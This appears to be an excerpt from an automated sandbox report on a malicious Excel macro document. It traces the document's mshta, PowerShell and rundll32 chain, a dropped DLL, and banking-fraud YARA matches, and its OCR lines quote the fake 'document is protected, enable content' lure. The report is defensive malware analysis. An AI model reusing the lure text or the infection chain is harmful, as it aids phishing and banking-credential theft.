                            Source: mshta.exe, 00000004.00000003.441733787.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443968366.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420316419.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445522967.00000000002CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,12_2_1001B43F
                            Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            Source: Yara matchFile source: 10.2.rundll32.exe.3110000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.360000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.480000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.940000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED

                            System Summary

                            Source: CJ68000754184.xls Macro extractor: Sheet: REEEEEEEE contains: mshta
                            Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
                            Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
                            Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
                            Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll
                            Source: CJ68000754184.xls Initial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038BE2710_2_0038BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037481610_2_00374816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00390C1410_2_00390C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038000110_2_00380001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038860610_2_00388606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038907F10_2_0038907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038AE6D10_2_0038AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00375E6010_2_00375E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038A66610_2_0038A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00371A5610_2_00371A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037205110_2_00372051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037225110_2_00372251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00374C5D10_2_00374C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00380E5310_2_00380E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0039005610_2_00390056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00386C4910_2_00386C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003770B310_2_003770B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037F09B10_2_0037F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037EA9910_2_0037EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038188910_2_00381889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037EE8110_2_0037EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037AEFB10_2_0037AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038DCF710_2_0038DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038A2E810_2_0038A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00389EEC10_2_00389EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00374EE310_2_00374EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003764E210_2_003764E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038DEDC10_2_0038DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037B2C710_2_0037B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003866CA10_2_003866CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037E2CC10_2_0037E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00385CC410_2_00385CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037773510_2_00377735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038473C10_2_0038473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00390F3310_2_00390F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00378B3D10_2_00378B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00376D2410_2_00376D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038BB2310_2_0038BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038851910_2_00388519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00380B1910_2_00380B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037971410_2_00379714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037BB7E10_2_0037BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038176B10_2_0038176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037536110_2_00375361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037896910_2_00378969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038CB5B10_2_0038CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037A55F10_2_0037A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038255010_2_00382550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037CF4710_2_0037CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037434610_2_00374346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038894B10_2_0038894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037B74D10_2_0037B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037554810_2_00375548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003781B710_2_003781B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003909B510_2_003909B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003751BB10_2_003751BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038C3A010_2_0038C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00387BA610_2_00387BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037E99110_2_0037E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038E39510_2_0038E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038D38910_2_0038D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00379B8310_2_00379B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00384B8710_2_00384B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00386DF810_2_00386DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037DFF310_2_0037DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038DBEA10_2_0038DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00388BE310_2_00388BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00387DD510_2_00387DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00372BD910_2_00372BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00389BCF10_2_00389BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00379DCF10_2_00379DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037E5CF10_2_0037E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003600712_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1004105012_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003130F12_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_100323E212_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003046012_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1004159212_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003E59F12_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003960C12_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_100317E212_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10040B0E12_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10031BB612_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10041C5612_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10036CB512_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1001CD1612_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10042D2112_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10031FC212_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BF8FD12_2_001BF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BE99112_2_001BE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BAB8712_2_001BAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B901112_2_001B9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C000112_2_001C0001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B205112_2_001B2051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001D005612_2_001D0056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C907F12_2_001C907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BF09B12_2_001BF09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C20BA12_2_001C20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B70B312_2_001B70B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C411612_2_001C4116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B51BB12_2_001B51BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B81B712_2_001B81B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B225112_2_001B2251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BE2CC12_2_001BE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BB2C712_2_001BB2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CA2E812_2_001CA2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B434612_2_001B4346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B536112_2_001B5361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CE39512_2_001CE395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CD38912_2_001CD389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001D13AD12_2_001D13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CC3A012_2_001CC3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CF43512_2_001CF435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C044F12_2_001C044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B64E212_2_001B64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C851912_2_001C8519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BA55F12_2_001BA55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C255012_2_001C2550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B554812_2_001B5548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BE5CF12_2_001BE5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C95FA12_2_001C95FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C860612_2_001C8606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CC63112_2_001CC631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CA66612_2_001CA666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BD6D812_2_001BD6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C66CA12_2_001C66CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B971412_2_001B9714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C473C12_2_001C473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B773512_2_001B7735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BB74D12_2_001BB74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C176B12_2_001C176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B481612_2_001B4816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C188912_2_001C1889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C894B12_2_001C894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B896912_2_001B8969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001D09B512_2_001D09B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B59F212_2_001B59F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CAA3012_2_001CAA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B1A5612_2_001B1A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BEA9912_2_001BEA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C0B1912_2_001C0B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B8B3D12_2_001B8B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CBB2312_2_001CBB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CCB5B12_2_001CCB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BBB7E12_2_001BBB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B9B8312_2_001B9B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C4B8712_2_001C4B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C7BA612_2_001C7BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B2BD912_2_001B2BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C9BCF12_2_001C9BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CDBEA12_2_001CDBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C8BE312_2_001C8BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001D0C1412_2_001D0C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CAC3A12_2_001CAC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B3C3C12_2_001B3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B7C3712_2_001B7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B4C5D12_2_001B4C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C6C4912_2_001C6C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C5CC412_2_001C5CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CDCF712_2_001CDCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B6D2412_2_001B6D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C7DD512_2_001C7DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B9DCF12_2_001B9DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C6DF812_2_001C6DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B3E3F12_2_001B3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001D0E3A12_2_001D0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CBE2712_2_001CBE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C0E5312_2_001C0E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CAE6D12_2_001CAE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B5E6012_2_001B5E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BEE8112_2_001BEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CDEDC12_2_001CDEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BAEFB12_2_001BAEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C9EEC12_2_001C9EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B4EE312_2_001B4EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001D0F3312_2_001D0F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BCF4712_2_001BCF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BDFF312_2_001BDFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B7FF212_2_001B7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00223C3C13_2_00223C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022901113_2_00229011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023044F13_2_0023044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002320BA13_2_002320BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022F8FD13_2_0022F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022D6D813_2_0022D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023473C13_2_0023473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023411613_2_00234116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002413AD13_2_002413AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022AB8713_2_0022AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00227FF213_2_00227FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002259F213_2_002259F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002395FA13_2_002395FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023BE2713_2_0023BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023C63113_2_0023C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023AA3013_2_0023AA30
